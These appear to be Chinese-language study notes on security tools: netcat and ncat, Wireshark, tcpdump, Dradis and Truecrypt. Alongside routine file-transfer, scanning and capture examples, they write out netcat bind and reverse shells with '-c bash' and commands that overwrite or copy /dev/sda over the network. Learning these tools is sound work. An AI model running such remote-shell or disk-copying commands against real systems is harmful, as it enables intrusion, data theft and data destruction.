基本工具
netcat (nc: 网络工具中的瑞士军刀)
小身材' 大智慧
使用:
nc -h 查看参数的使用
nc -v
nc使用
nc使用
nc -vn -v 详细信息 -n 后接ip地址 不允许接域名(不建议接域名)
nc -vn 10.1.1.1 10 链接 ip 10.1.1.0 端口 10
传输文本信息:
nc -l -p 4444 监听4444端口 服务端
nc -nv 10.0.0.1 4444 客户端
ls -l | nc -nv 10.1.1.10 4444 执行 结果进行传输
ps aux进程信息
lsof 所有内容
nc -l -p 4444 > ps.txt 传进来的信息存到ps.txt中
ls -l | nc -nv 10.1.1.10 4444 -q 1 执行完成之后1s自动断开链接
远程控制
正向:
A: nc -lp 333 -c bash
B: nc -nv 10.1.1.1 333
反响:
A: nc -lp 333
B: nc -nv 1.1.1.1 333 -c bash
nc缺点:
传输数据不加密
不安全
不同平台 参数可能不同
传输文件
nc -lp 333 > 1.mp4
nc -nv 1.1.1.1 333 < 1.mp4 -q 1
传输目录
现打包在传输
接受后解压
tar -cvf - music/ | nc -lp 3333 -q 1
nc -nv 10.1.1.1 3333 | tar -xvf -
加密传文件
nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
先安装mcrypt
mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q
nc-流媒体服务器
cat 1.map4 | nc -lp 3333
nc -nv 1.1.1.1 9999 | mplayer -vo x11 -cacher 3000 -
端口扫描
nc -nvz 10.1.1.1 1-65535 监测tcp端口
nc -nvzu 10.1.1.1 1-65535 监测udp端口
远程克隆硬盘
nc -lp 333 | dd of=/dev/sda
dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
也可以复制内存
Ncat 包含于nmap工具包中
文件传输是加密的
被控制端: ncat -c bash --allow 10.0.2.15 -vnl 9999 --ssl
控制端: ncat -nv 10.0.2.4 9999 --ssl
(采用ssl进行传输加密)
wireshark使用
抓包嗅探协议分析
必须掌握
使用:
选择网卡
混杂模式 监听范围更广
保存结果时选择 pcap 其他抓包软件也可以识别
常见协议包
Arp
dns 域名解析
http 明文传输
用抓包抓取数据包 查看信息 存在安全隐患
用https 其用ssl加密
信息统计
在 统计(s)中
专家信息
实战
抓取nc和ncat
wireshark强大但不完美
不足:抓大流量或大文件性能欠缺
sniffer
cace/riverbed
tcpdump
no-gui的抓包分析工具
linux unix默认安装
默认只抓68个字节
tcpdump -i eth0 -s 0 -w a.cap
-s 包大小 0 全部抓取
-w 保存到文件
tcpdumo -r -A a.cap
读取抓取的信息
-A 以as码
-X 16进制显示信息
抓包筛选器
tcpdump -i eth0 tcp port 22
抓取tcp 端口22的数据
tcpdump -i eth0 tcp port 22 | awk '{print $3}' | sort -u
sort -u去掉重复的内容
tcpdump -n src host 145.254.160.22 -r http.cap
只读取145.254.160.22来源的数据包
-n dst 目标地址
-n port 端口号
高级筛选功能
tcpdump -A -n 'tcp[13]=24' -r http.cap
过程文档记录
Dradis kali linux 默认是关闭的
手动打开服务: application->system services ->dradis start
会打开浏览器 只输入密码就可以不需要输入账号
第一次登陆设置初始密码
在浏览器打开的界面可以分享日志等
Truecrypt 加密文件